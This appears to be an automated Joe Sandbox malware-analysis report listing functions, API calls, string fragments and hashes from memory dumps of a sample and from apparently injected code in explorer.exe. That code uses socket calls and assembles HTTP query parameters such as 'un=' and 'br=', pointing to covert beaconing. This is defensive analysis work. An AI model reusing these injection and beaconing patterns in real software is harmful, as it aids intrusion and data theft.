Function 01A0F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A6E790

Strings

(HeapHandle != NULL), xrefs: 01A6E719
HEAP[%wZ]: , xrefs: 01A6E701
HEAP: , xrefs: 01A6E70E

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: 00c3e157a9751a1deac566b68560c96f64672b587d0c543a3b266d7710fe2558
Instruction ID: 1355fb97d4012c15553c03230f8b2c348d5ccfd29207d3bd1f52109bcf054725
Opcode Fuzzy Hash: 00c3e157a9751a1deac566b68560c96f64672b587d0c543a3b266d7710fe2558
Instruction Fuzzy Hash: C8912771704742DFD737DB28D984B7AB7A9BF94B40F040459E945AB2C1DB38E844CB91

Function 01A39803 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A39A02

Strings

Unmapping DLL "%wZ", xrefs: 01A7DCE4
LdrpUnloadNode, xrefs: 01A7DCEB
minkernel\ntdll\ldrsnap.c, xrefs: 01A7DCF5

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: dfd49f05f90c9d3739565367613175b785358e9819c339b8e3bae3b1656cdd90
Instruction ID: 876d5d6c4ac058677313229152749e78cf34fae590506765b1d9bd6c7d50e39d
Opcode Fuzzy Hash: dfd49f05f90c9d3739565367613175b785358e9819c339b8e3bae3b1656cdd90
Instruction Fuzzy Hash: D551B3317003029FD726EF28C985B2AB7A1BBD4718F04062DF596972A5DBB0A805CB81

Function 01A4BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01A87BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A87B7F
RTL: Resource at %p, xrefs: 01A87B8E

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: d6a30808e2edc480fac41cafb304bf5819033d1ca048955275b0335af2798ce1
Instruction ID: c1a244abf2a8935d3fe6922d8c658a40f4e8c45e50a49d2b4c1825a54d7d8c77
Opcode Fuzzy Hash: d6a30808e2edc480fac41cafb304bf5819033d1ca048955275b0335af2798ce1
Instruction Fuzzy Hash: 3441D3353047029FDB25DF29C941B6AB7E5EFD8720F100A1DFA5ADB680DB31E8458BA1

Function 01A4B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A8728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A87294
RTL: Re-Waiting, xrefs: 01A872C1
RTL: Resource at %p, xrefs: 01A872A3

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: e8b1deb3e1308f3575790e46e28ce152002c1739aebe4b425ee3f6c1238634c3
Instruction ID: 682c6cc000a70980d39856d040641319f9efbe2c15e7f172e1b072c08de6fecf
Opcode Fuzzy Hash: e8b1deb3e1308f3575790e46e28ce152002c1739aebe4b425ee3f6c1238634c3
Instruction Fuzzy Hash: D1410231700202ABDB21EF69CD41B6ABBA5FB94710F240619F955EB241EB31F852CBE1

Function 01AC2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01AC238D
___swprintf_l.LIBCMT ref: 01AC23B3

Strings

%%%u, xrefs: 01AC2384
]:%u, xrefs: 01AC23AA

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: d0487122adff7a578a4b22d87e3345ca0336cac1325236a2ad51991155a89f2a
Instruction ID: 76cb125fe9d04974f962c879fe7a69875924746b72e84374a2ab64c50d19c846
Opcode Fuzzy Hash: d0487122adff7a578a4b22d87e3345ca0336cac1325236a2ad51991155a89f2a
Instruction Fuzzy Hash: F5317876A002199FDB21DF2DDD40BEEB7F8FF54610F44459AE949E3240EB309A548BA0

Function 01A95F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A95F8F
RtlDebugPrintTimes.NTDLL ref: 01A95FB1
RtlDebugPrintTimes.NTDLL ref: 01A95FBE

Strings

Wow64 Emulation Layer, xrefs: 01A95F89

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Wow64 Emulation Layer
API String ID: 3446177414-921169906
Opcode ID: 47d1b0ac97cbe789a50330c6f643a28924b0967eff49e29fbedf15f46c46ac2e
Instruction ID: 64c8766380c57199c684563fc65a76e10d38a7a410d16845fc12bb069768cc2f
Opcode Fuzzy Hash: 47d1b0ac97cbe789a50330c6f643a28924b0967eff49e29fbedf15f46c46ac2e
Instruction Fuzzy Hash: C8213075A0021DBFAF029BA5CD89CBF7BBDEF556A8B040069FA05A2104D7309E419B60

Function 01A3EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a8d8d2e0bbdf73d242430c3b41d4267df446b40a7cc413decceb2f3d5088896
Instruction ID: 519ad2712cf0c76ae7248fd07d0a98f04d565fe3d1d2d5c6a723e92e39da04ff
Opcode Fuzzy Hash: 1a8d8d2e0bbdf73d242430c3b41d4267df446b40a7cc413decceb2f3d5088896
Instruction Fuzzy Hash: 1EE11070D10708DFCB26CFA9DA80A9DFBF1BF89314F24452AEA56A7221D770A941CF11

Function 01A8EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A8EFE1
RtlDebugPrintTimes.NTDLL ref: 01A8F009
RtlDebugPrintTimes.NTDLL ref: 01A8F0AC
RtlDebugPrintTimes.NTDLL ref: 01A8F160

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 63d7f4e05be0022ec0588393ff1e5eadfc131a7a7d1f76fd02e91da03828c03b
Instruction ID: cb344c3a7abd05fbf7b746a8f8d42e715e80d3232c55cba34ad4ef32d2a1aac9
Opcode Fuzzy Hash: 63d7f4e05be0022ec0588393ff1e5eadfc131a7a7d1f76fd02e91da03828c03b
Instruction Fuzzy Hash: 4D711671E0021AEFDF05EFA8C984ADDBBF5BF48314F18402AEA05EB254D734A945CB64

Function 01AEA4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01AEA577
RtlDebugPrintTimes.NTDLL ref: 01AEA62A
RtlDebugPrintTimes.NTDLL ref: 01AEA64E
RtlDebugPrintTimes.NTDLL ref: 01AEA663

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 8f22fe38d2004401519530e0f3668a80c2a1d62a9590e1b181892b5796f4e309
Instruction ID: 3b2c2696f43679b38bfb71ed30d40df8924d243614e7c87b5aaca0f1dac93600
Opcode Fuzzy Hash: 8f22fe38d2004401519530e0f3668a80c2a1d62a9590e1b181892b5796f4e309
Instruction Fuzzy Hash: 37514A35700A129FDB19CF69C4A9A29B7F1FB89314B18416DDA0ACB715DB74EC41CB90

Function 01A8F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A8F26D
RtlDebugPrintTimes.NTDLL ref: 01A8F292
RtlDebugPrintTimes.NTDLL ref: 01A8F324
RtlDebugPrintTimes.NTDLL ref: 01A8F378

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 15b27eda5e06bc75bfc41fe72fc647944e4e6c91896eb257c3d449500ca05065
Instruction ID: 3960135dfac0f5c9594f88dc20831c4749d5938c7a33ebbde41e34f71b8bba7f
Opcode Fuzzy Hash: 15b27eda5e06bc75bfc41fe72fc647944e4e6c91896eb257c3d449500ca05065
Instruction Fuzzy Hash: 6D5131B6E0021AAFDF09DF99D844ADCBBF1FF48314F18812AE915AB250E734A941CF54

Function 01A47B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A47B52
BaseThreadInitThunk.KERNEL32 ref: 01A47B5C
RtlDebugPrintTimes.NTDLL ref: 01A849ED
RtlDebugPrintTimes.NTDLL ref: 01A84A70

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: 70af65c7d62301920985b10e4ed70dd7ccf8d228c60f33b15b15fa440c2fd691
Instruction ID: 6026730af9f16eda6b934d24b3205c0c77bd381adee2acb26781491d8118dedf
Opcode Fuzzy Hash: 70af65c7d62301920985b10e4ed70dd7ccf8d228c60f33b15b15fa440c2fd691
Instruction Fuzzy Hash: D8310575E00219AFCF26EFA8D944AADBBF1BB5C720F14412AE911B7294D7355900CF54

Function 01A159C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 01A70AA7

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 912b8fb11fb050583c206b3dedb9f8ead0e7f8a99e684f281ae667a90209e4c8
Instruction ID: e7570dbf913cee8b6ffbb43dd7a91a0b87c7be7b178fcdbfa1daad9facfffebc
Opcode Fuzzy Hash: 912b8fb11fb050583c206b3dedb9f8ead0e7f8a99e684f281ae667a90209e4c8
Instruction Fuzzy Hash: 70326A70D0426ADFDB21CF68C984BEDBBB0BF5A304F0481E9D549A7285D7B49A84CF91

Function 01A57D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01A57E8B

Strings

-, xrefs: 01A57DDD
+, xrefs: 01A57DE8

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 65b931881f94545dcf87752103bb880187d8517a086c2e8ccde55199b6265822
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: D091C371E082169BEFA4DFADC880ABEBBB5AF44320F94451AED55B72C0D7348944CB50

Function 01A44C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 01A44CC3
Flst, xrefs: 01A44C96

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 1e0b41b1770822cc3e3eda96d5d3538eb1cebedaf933421b78fc58cc7785d3bd
Instruction ID: 77b386699551b0f2c8e7a36f7dd8966463b335a8f524e114c2c0b5a58d55b694
Opcode Fuzzy Hash: 1e0b41b1770822cc3e3eda96d5d3538eb1cebedaf933421b78fc58cc7785d3bd
Instruction Fuzzy Hash: E7517DB1E002188FDF26DF99D984769FBF4FF88758F14802AD0899B255E770D989CB80

Function 01A9CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 01A9CFBD

Strings

@4Qw@4Qw, xrefs: 01A9CFD5, 01A9CFDA, 01A9CFF1
@, xrefs: 01A9CF0A

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Qw@4Qw
API String ID: 4062629308-2383119779
Opcode ID: a153e0ecd1b8f56669d96b40549ebb9b7665c6bc0d30b7e0b1975ef09652ff90
Instruction ID: 840f9a414c5c02ce4dc1cd5e5e6e27f5fe9be7bd753d0c66e3706e4f8fcca486
Opcode Fuzzy Hash: a153e0ecd1b8f56669d96b40549ebb9b7665c6bc0d30b7e0b1975ef09652ff90
Instruction Fuzzy Hash: 0A41B175900225DFCF229FAAC940AADBBF8FF54B20F04442AEA05DB264D734D881CB61

Function 01AB705E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01AB70C2

Strings

kLsE, xrefs: 01AB70A4
B,1U, xrefs: 01AB71C6

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: B,1U$kLsE
API String ID: 3446177414-1235316188
Opcode ID: 9f3ab5922a9bdef369f3438118439675250f34628ae0d733b737da37c79af24d
Instruction ID: be4d504513796bda5fc2e835150ade32189a59a9234116867bd828630a36ff7a
Opcode Fuzzy Hash: 9f3ab5922a9bdef369f3438118439675250f34628ae0d733b737da37c79af24d
Instruction Fuzzy Hash: 33412B715013924AE733ABB8E9C4BE53F98BBA0764F14062DFE508B0DACBB44495C7A1

Function 01A0DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A0E040

Strings

0, xrefs: 01A0E00B
0, xrefs: 01A0E020

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 1aa828f92d4ac10c3957a1e1508ae67aaa8bdfc09341d9a52d14f1afa0378984
Instruction ID: b41546f07e78667cdde7ed0ed4163e4d078a80a784e1aa01904c56bb10c9c97e
Opcode Fuzzy Hash: 1aa828f92d4ac10c3957a1e1508ae67aaa8bdfc09341d9a52d14f1afa0378984
Instruction Fuzzy Hash: D3415CB26087069FD311CF6CD584A16BBE5BF88314F04892EF988DB341D771E905CB96

Analysis Process: explorer.exePID: 4084, Parent PID: 8056COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.4%
Total number of Nodes:	79
Total number of Limit Nodes:	9

Executed Functions

Function 0F8EEF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 0F8EF12E
setsockopt.WS2_32 ref: 0F8EF830
recv.WS2_32 ref: 0F8EF859

Strings

&sql, xrefs: 0F8EF471
nnec, xrefs: 0F8EF32A
Co, xrefs: 0F8EF323
ose, xrefs: 0F8EF33F
&br=, xrefs: 0F8EF509
GET , xrefs: 0F8EF318
&un=, xrefs: 0F8EF4F1
dat=, xrefs: 0F8EF290
: cl, xrefs: 0F8EF338
tion, xrefs: 0F8EF331

Memory Dump Source

Source File: 0000000A.00000002.2433679563.000000000F820000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f820000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: b54104eae3b6da6b71d8091db54111a7433390a444e59f29437179767b768f10
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: 54526C31618B088FCB69EF68C4847EAB7E1FB55300F50466EC5AFCB147EA34A549CB91

Function 0F8EE232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 0F8EE449

Strings

`, xrefs: 0F8EE41D

Memory Dump Source

Source File: 0000000A.00000002.2433679563.000000000F820000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f820000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: bfe11b80aeb18740e7d26bc4115abf9df17b773272ce3451bb0310b0882e47ef
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: A7225C70A18A099FCB59DF28C4986EEF7E1FB59305F81022EE45EDB651DB30E451CB82

Function 0F8EFE12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0F8EFE67

Memory Dump Source

Source File: 0000000A.00000002.2433679563.000000000F820000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f820000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 3210b824c94628de799a02377abf968976cadea41904d53cab26d1c09c725e95
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 13019E30628B484F8B88EF6C948416AB7E4FBCA214F000B3EA99AC7255EB64D5414742

Function 0F8EFE0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0F8EFE67

Memory Dump Source

Source File: 0000000A.00000002.2433679563.000000000F820000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f820000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: c03ad0d89beaa046286eadf8c94857059455ac6c48fa9649cb5e46e2cf0bd8b0
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: DF01A234628B884B8B88EF3C94452A6B3E5FBCE314F000B3EE9DAC7241DB25D5024782

Function 0F8E98C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0F8E99A0

Strings

User-Agent: , xrefs: 0F8E9935, 0F8E9948
nt: , xrefs: 0F8E991E
on.d, xrefs: 0F8E9902
urlmon.dll, xrefs: 0F8E9959

Memory Dump Source

Source File: 0000000A.00000002.2433679563.000000000F820000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f820000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: f49e23f34ec77ff35be6e58e9ebbb108b19a68433d52b99995f6da705aab9bb5
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: D231D431614B0D9FCF44EFA8C8847EDBBE0FB58205F40022AD55EDB241DE788645C78A

Function 0F8E98BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0F8E99A0

Strings

User-Agent: , xrefs: 0F8E9935, 0F8E9948
nt: , xrefs: 0F8E991E
on.d, xrefs: 0F8E9902
urlmon.dll, xrefs: 0F8E9959

Memory Dump Source

Source File: 0000000A.00000002.2433679563.000000000F820000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F820000, based on PE: false

Joe Sandbox IDA Plugin

